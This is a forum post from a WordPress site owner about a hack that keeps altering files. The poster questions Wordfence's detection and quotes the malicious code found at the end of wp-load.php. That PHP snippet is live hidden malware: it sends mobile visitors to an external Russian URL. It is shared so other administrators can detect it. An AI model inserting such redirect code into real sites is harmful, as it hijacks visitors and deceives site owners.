|
we discovered hack like 2 weeks back, since then theres wordfence active, it sends email that someone altered file but did this only once after 2 days file become altered again and wordfence didn't raise the alarm - i've checked file manually and noticed hack redirecting mobile traffic to some ukrainian site (earlier was china).
so i don't know what to think about wordfence it worked once so far and yes this live traffic feature, blocking ip's are awesome but for real we need to protect files from being altered and wordfence failed to send notice with it.
none folder is 777 i think.
any more comes to your mind guys, let me know.
i'll keep you posted with progress.
btw:
check your wp-load.php file, i found such code on the bottom (redirecting to russian site, on other site today i've found redirect to ukrainian one)
"
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+3600, '/');
@header("Location: http://hvoraem-net.ru/top/top1.php");
die();}"
|